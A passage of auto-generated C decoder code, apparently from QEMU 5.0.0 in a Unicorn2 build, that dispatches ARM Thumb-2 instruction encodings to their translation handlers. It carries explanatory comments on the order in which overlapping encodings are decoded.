&u.f_s_rrr_shi)) return true; return false; case 0x00200000: /* 11101010 011..... 0....... ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11101010 011.1111 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:70 */ disas_t32_extract_s_rxr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_MVN_rxri(ctx, &u.f_s_rrr_shi)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:71 */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_ORN_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00800000: /* 11101010 110..... 0....... ........ */ disas_t32_extract_disas_t32_Fmt_3(ctx, &u.f_pkh, insn); switch (insn & 0x00100010) { case 0x00000000: /* 11101010 1100.... 0....... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:77 */ if (trans_PKH(ctx, &u.f_pkh)) return true; return false; } return false; } return false; case 0x03000000: /* 11101011 .0...... ........ ........ */ switch (insn & 0x00a08000) { case 0x00000000: /* 11101011 000..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11101011 0001.... 0...1111 ........ 
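   [annotation: the same S=1/Rd=1111 overlap applies to the arithmetic
    rows: CMN is tried before ADD here, and CMP before SUB further on,
    for the shifted-register forms]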
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:80 */ disas_t32_extract_S_xrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_CMN_xrri(ctx, &u.f_s_rrr_shi)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:81 */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_ADD_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00a00000: /* 11101011 101..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11101011 1011.... 0...1111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:86 */ disas_t32_extract_S_xrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_CMP_xrri(ctx, &u.f_s_rrr_shi)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:87 */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); if (trans_SUB_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; case 0x03400000: /* 11101011 .1...... ........ ........ */ disas_t32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); switch (insn & 0x00a08000) { case 0x00000000: /* 11101011 010..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:83 */ if (trans_ADC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00200000: /* 11101011 011..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:84 */ if (trans_SBC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00800000: /* 11101011 110..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:89 */ if (trans_RSB_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; } return false; case 0x1e: /* 11110... ........ ........ ........ */ switch ((insn >> 15) & 0x1) { case 0x0: /* 11110... ........ 0....... ........ */ switch ((insn >> 22) & 0xf) { case 0x0: /* 11110.00 00...... 0....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 11110.00 000..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11110.00 0001.... 0...1111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:109 */ disas_t32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_TST_xri(ctx, &u.f_s_rri_rot)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:110 */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_AND_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x1: /* 11110.00 001..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:112 */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_BIC_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x1: /* 11110.00 01...... 0....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 11110.00 010..... 0....... ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11110.00 010.1111 0....... ........ 
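   [annotation: for the modified-immediate rows, Rn=1111 (mask
    0x000f0000) selects the register-less alias, so MOV is tried
    before ORR and MVN before ORN]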
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:114 */ disas_t32_extract_s_rxi_rot(ctx, &u.f_s_rri_rot, insn); if (trans_MOV_rxi(ctx, &u.f_s_rri_rot)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:115 */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_ORR_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x1: /* 11110.00 011..... 0....... ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11110.00 011.1111 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:118 */ disas_t32_extract_s_rxi_rot(ctx, &u.f_s_rri_rot, insn); if (trans_MVN_rxi(ctx, &u.f_s_rri_rot)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:119 */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_ORN_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x2: /* 11110.00 10...... 0....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 11110.00 100..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11110.00 1001.... 0...1111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:122 */ disas_t32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_TEQ_xri(ctx, &u.f_s_rri_rot)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:123 */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_EOR_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x4: /* 11110.01 00...... 0....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 11110.01 000..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11110.01 0001.... 0...1111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:126 */ disas_t32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_CMN_xri(ctx, &u.f_s_rri_rot)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:127 */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_ADD_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x5: /* 11110.01 01...... 0....... ........ */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 21) & 0x1) { case 0x0: /* 11110.01 010..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:129 */ if (trans_ADC_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x1: /* 11110.01 011..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:130 */ if (trans_SBC_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x6: /* 11110.01 10...... 0....... ........ */ switch ((insn >> 21) & 0x1) { case 0x1: /* 11110.01 101..... 0....... ........ */ if ((insn & 0x00100f00) == 0x00100f00) { /* 11110.01 1011.... 0...1111 ........ 
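   [annotation: the don't-care bit in the 11110.01 patterns is bit 26,
    the i bit of the 12-bit modified immediate, so it takes no part in
    opcode dispatch; CMP again precedes SUB when S=1 and Rd=1111]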
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:132 */ disas_t32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_CMP_xri(ctx, &u.f_s_rri_rot)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:133 */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_SUB_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x7: /* 11110.01 11...... 0....... ........ */ disas_t32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 21) & 0x1) { case 0x0: /* 11110.01 110..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:135 */ if (trans_RSB_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x8: /* 11110.10 00...... 0....... ........ */ switch ((insn >> 20) & 0x3) { case 0x0: /* 11110.10 0000.... 0....... ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11110.10 00001111 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:145 */ disas_t32_extract_disas_t32_Fmt_9(ctx, &u.f_ri, insn); if (trans_ADR(ctx, &u.f_ri)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:147 */ disas_t32_extract_s0_rri_12(ctx, &u.f_s_rri_rot, insn); if (trans_ADD_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x9: /* 11110.10 01...... 0....... ........ */ disas_t32_extract_mov16(ctx, &u.f_ri, insn); switch ((insn >> 20) & 0x3) { case 0x0: /* 11110.10 0100.... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:161 */ if (trans_MOVW(ctx, &u.f_ri)) return true; return false; } return false; case 0xa: /* 11110.10 10...... 0....... ........ */ switch ((insn >> 20) & 0x3) { case 0x2: /* 11110.10 1010.... 0....... ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11110.10 10101111 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:150 */ disas_t32_extract_disas_t32_Fmt_10(ctx, &u.f_ri, insn); if (trans_ADR(ctx, &u.f_ri)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:152 */ disas_t32_extract_s0_rri_12(ctx, &u.f_s_rri_rot, insn); if (trans_SUB_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0xb: /* 11110.10 11...... 0....... ........ */ disas_t32_extract_mov16(ctx, &u.f_ri, insn); switch ((insn >> 20) & 0x3) { case 0x0: /* 11110.10 1100.... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:162 */ if (trans_MOVT(ctx, &u.f_ri)) return true; return false; } return false; case 0xc: /* 11110.11 00...... 0....... ........ */ switch (insn & 0x04100020) { case 0x00000000: /* 11110011 00.0.... 0....... ..0..... */ if ((insn & 0x002070c0) == 0x00200000) { /* 11110011 0010.... 0000.... 000..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:172 */ disas_t32_extract_sat16(ctx, &u.f_sat, insn); if (trans_SSAT16(ctx, &u.f_sat)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:173 */ disas_t32_extract_sat(ctx, &u.f_sat, insn); if (trans_SSAT(ctx, &u.f_sat)) return true; return false; } return false; case 0xd: /* 11110.11 01...... 0....... ........ */ switch (insn & 0x04300020) { case 0x00000000: /* 11110011 0100.... 0....... 
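   [annotation: bitfield group: SBFX, BFCI (the combined BFC/BFI
    pattern) and UBFX; the SSAT16/USAT16 forms above are tried before
    the wider SSAT/USAT patterns that they overlap]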
..0..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:185 */ disas_t32_extract_bfx(ctx, &u.f_bfx, insn); if (trans_SBFX(ctx, &u.f_bfx)) return true; return false; case 0x00200000: /* 11110011 0110.... 0....... ..0..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:189 */ disas_t32_extract_bfi(ctx, &u.f_bfi, insn); if (trans_BFCI(ctx, &u.f_bfi)) return true; return false; } return false; case 0xe: /* 11110.11 10...... 0....... ........ */ switch (insn & 0x04100020) { case 0x00000000: /* 11110011 10.0.... 0....... ..0..... */ if ((insn & 0x002070c0) == 0x00200000) { /* 11110011 1010.... 0000.... 000..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:176 */ disas_t32_extract_sat16(ctx, &u.f_sat, insn); if (trans_USAT16(ctx, &u.f_sat)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:177 */ disas_t32_extract_sat(ctx, &u.f_sat, insn); if (trans_USAT(ctx, &u.f_sat)) return true; return false; } return false; case 0xf: /* 11110.11 11...... 0....... ........ */ disas_t32_extract_bfx(ctx, &u.f_bfx, insn); switch (insn & 0x04300020) { case 0x00000000: /* 11110011 1100.... 0....... ..0..... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:186 */ if (trans_UBFX(ctx, &u.f_bfx)) return true; return false; } return false; } return false; case 0x1: /* 11110... ........ 1....... ........ */ switch (insn & 0x00005000) { case 0x00000000: /* 11110... ........ 10.0.... ........ */ if ((insn & 0x03800000) == 0x03800000) { /* 11110.11 1....... 10.0.... ........ */ if ((insn & 0x047f2f00) == 0x002f0000) { /* 11110011 10101111 10000000 ........ */ if ((insn & 0x000000ff) == 0x00000001) { /* 11110011 10101111 10000000 00000001 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:297 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_YIELD(ctx, &u.f_empty)) return true; } if ((insn & 0x000000ff) == 0x00000002) { /* 11110011 10101111 10000000 00000010 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:298 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_WFE(ctx, &u.f_empty)) return true; } if ((insn & 0x000000ff) == 0x00000003) { /* 11110011 10101111 10000000 00000011 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:299 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_WFI(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:307 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } if ((insn & 0x047f2800) == 0x002f0000) { /* 11110011 10101111 10000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:311 */ disas_t32_extract_disas_t32_Fmt_23(ctx, &u.f_cps, insn); if (trans_CPS(ctx, &u.f_cps)) return true; } if ((insn & 0x047f2f80) == 0x003f0f00) { /* 11110011 10111111 10001111 0....... 
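   [annotation: barrier space: CLREX, then DSB/DMB/ISB selected by
    insn[6:4], with SB as the 01110000 byte; unallocated hints in the
    block above have already fallen back to trans_NOP]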
*/ if ((insn & 0x0000007f) == 0x0000002f) { /* 11110011 10111111 10001111 00101111 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:316 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_CLREX(ctx, &u.f_empty)) return true; } if ((insn & 0x00000070) == 0x00000040) { /* 11110011 10111111 10001111 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:317 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_DSB(ctx, &u.f_empty)) return true; } if ((insn & 0x00000070) == 0x00000050) { /* 11110011 10111111 10001111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:318 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_DMB(ctx, &u.f_empty)) return true; } if ((insn & 0x00000070) == 0x00000060) { /* 11110011 10111111 10001111 0110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:319 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_ISB(ctx, &u.f_empty)) return true; } if ((insn & 0x0000007f) == 0x00000070) { /* 11110011 10111111 10001111 01110000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:320 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_SB(ctx, &u.f_empty)) return true; } } if ((insn & 0x04602000) == 0x00600000) { /* 11110011 111..... 1000.... ........ */ if ((insn & 0x000000ef) == 0x00000020) { /* 11110011 111..... 1000.... 001.0000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:325 */ disas_t32_extract_disas_t32_Fmt_24(ctx, &u.f_mrs_bank, insn); if (trans_MRS_bank(ctx, &u.f_mrs_bank)) return true; } if ((insn & 0x000f00ff) == 0x000f0000) { /* 11110011 111.1111 1000.... 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:327 */ disas_t32_extract_disas_t32_Fmt_25(ctx, &u.f_mrs_reg, insn); if (trans_MRS_reg(ctx, &u.f_mrs_reg)) return true; } if ((insn & 0x001f0000) == 0x000f0000) { /* 11110011 11101111 1000.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:328 */ disas_t32_extract_disas_t32_Fmt_26(ctx, &u.f_disas_t3227, insn); if (trans_MRS_v7m(ctx, &u.f_disas_t3227)) return true; } } if ((insn & 0x04602000) == 0x00000000) { /* 11110011 100..... 1000.... ........ */ if ((insn & 0x000000ef) == 0x00000020) { /* 11110011 100..... 1000.... 001.0000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:331 */ disas_t32_extract_disas_t32_Fmt_27(ctx, &u.f_msr_bank, insn); if (trans_MSR_bank(ctx, &u.f_msr_bank)) return true; } if ((insn & 0x000000ff) == 0x00000000) { /* 11110011 100..... 1000.... 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:333 */ disas_t32_extract_disas_t32_Fmt_28(ctx, &u.f_msr_reg, insn); if (trans_MSR_reg(ctx, &u.f_msr_reg)) return true; } if ((insn & 0x00100300) == 0x00000000) { /* 11110011 1000.... 1000..00 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:334 */ disas_t32_extract_disas_t32_Fmt_29(ctx, &u.f_disas_t3228, insn); if (trans_MSR_v7m(ctx, &u.f_disas_t3228)) return true; } } if ((insn & 0x04702fff) == 0x00400f00) { /* 11110011 1100.... 
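   [annotation: system instructions: BXJ, then ERET, which overlaps
    the SUBS PC, LR, #imm exception-return encoding tried right after
    it, then SMC, HVC and the permanently undefined UDF]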
10001111 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:336 */ disas_t32_extract_disas_t32_Fmt_30(ctx, &u.f_r, insn); if (trans_BXJ(ctx, &u.f_r)) return true; } if ((insn & 0x047f2f00) == 0x005e0f00) { /* 11110011 11011110 10001111 ........ */ if ((insn & 0x000000ff) == 0x00000000) { /* 11110011 11011110 10001111 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:341 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_ERET(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:342 */ disas_t32_extract_disas_t32_Fmt_31(ctx, &u.f_s_rri_rot, insn); if (trans_SUB_rri(ctx, &u.f_s_rri_rot)) return true; } if ((insn & 0x04702fff) == 0x04700000) { /* 11110111 1111.... 10000000 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:345 */ disas_t32_extract_disas_t32_Fmt_32(ctx, &u.f_i, insn); if (trans_SMC(ctx, &u.f_i)) return true; } if ((insn & 0x04702000) == 0x04600000) { /* 11110111 1110.... 1000.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:346 */ disas_t32_extract_disas_t32_Fmt_33(ctx, &u.f_i, insn); if (trans_HVC(ctx, &u.f_i)) return true; } if ((insn & 0x04702000) == 0x04702000) { /* 11110111 1111.... 1010.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:348 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_UDF(ctx, &u.f_empty)) return true; } } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:350 */ disas_t32_extract_disas_t32_Fmt_34(ctx, &u.f_ci, insn); if (trans_B_cond_thumb(ctx, &u.f_ci)) return true; return false; case 0x00001000: /* 11110... ........ 10.1.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:629 */ disas_t32_extract_branch24(ctx, &u.f_i, insn); if (trans_B(ctx, &u.f_i)) return true; return false; case 0x00004000: /* 11110... ........ 11.0.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:631 */ disas_t32_extract_branch24(ctx, &u.f_i, insn); if (trans_BLX_i(ctx, &u.f_i)) return true; return false; case 0x00005000: /* 11110... ........ 11.1.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:630 */ disas_t32_extract_branch24(ctx, &u.f_i, insn); if (trans_BL(ctx, &u.f_i)) return true; return false; } return false; } return false; case 0x1f: /* 11111... ........ ........ ........ */ switch ((insn >> 24) & 0x7) { case 0x0: /* 11111000 ........ ........ ........ */ switch ((insn >> 20) & 0x7) { case 0x0: /* 11111000 .000.... ........ ........ */ switch ((insn >> 23) & 0x1) { case 0x0: /* 11111000 0000.... ........ ........ */ switch (insn & 0x00000900) { case 0x00000000: /* 11111000 0000.... ....0..0 ........ */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); switch (insn & 0x000006c0) { case 0x00000000: /* 11111000 0000.... ....0000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:368 */ if (trans_STRB_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x00000800: /* 11111000 0000.... ....1..0 ........ */ switch ((insn >> 9) & 0x3) { case 0x2: /* 11111000 0000.... ....1100 ........ 
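   [annotation: STRB addressing forms: register offset, negative
    immediate, user-mode STRBT, pre/post-indexed (the ....1..1
    patterns) and the plain positive-immediate form]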
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:370 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_STRB_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x3: /* 11111000 0000.... ....1110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:371 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_STRBT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x00000900: /* 11111000 0000.... ....1..1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:369 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_STRB_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x1: /* 11111000 1000.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:372 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_STRB_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x1: /* 11111000 .001.... ........ ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11111000 .0011111 ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 .0011111 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:389 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:390 */ disas_t32_extract_ldst_ri_lit(ctx, &u.f_ldst_ri, insn); if (trans_LDRB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800000) == 0x00800000) { /* 11111000 1001.... ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 1001.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:393 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:394 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_LDRB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800900) == 0x00000900) { /* 11111000 0001.... ....1..1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:396 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_LDRB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000c00) { /* 11111000 0001.... ....1100 ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 0001.... 11111100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:398 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:399 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_LDRB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000e00) { /* 11111000 0001.... ....1110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:401 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_LDRBT_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800fc0) == 0x00000000) { /* 11111000 0001.... ....0000 00...... 
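   [annotation: throughout the LDRB rows, Rt=1111 (mask 0x0000f000) is
    routed to trans_NOP; these appear to be the PLD preload-hint
    encodings, which this decoder treats as no-ops]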
